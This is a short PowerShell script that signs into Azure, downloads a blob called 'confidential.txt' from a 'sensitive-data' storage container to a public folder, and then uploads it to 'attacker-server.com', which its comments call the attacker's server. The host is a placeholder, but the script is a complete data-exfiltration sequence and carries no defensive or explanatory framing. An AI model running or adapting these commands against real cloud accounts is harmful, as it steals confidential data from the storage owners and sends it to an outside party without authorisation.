# Log in to Azure
Connect-AzAccount

# Get storage account context
$storageAccount = Get-AzStorageAccount -ResourceGroupName "example-resource-group" -Name "examplestorageaccount"
$ctx = $storageAccount.Context

# Download sensitive data from the storage account
Get-AzStorageBlobContent -Container "sensitive-data" -Blob "confidential.txt" -Destination "C:\Users\Public\confidential.txt" -Context $ctx

# Upload the data to the attacker's server
Invoke-WebRequest -Uri "http://attacker-server.com/upload" -Method Post -InFile "C:\Users\Public\confidential.txt"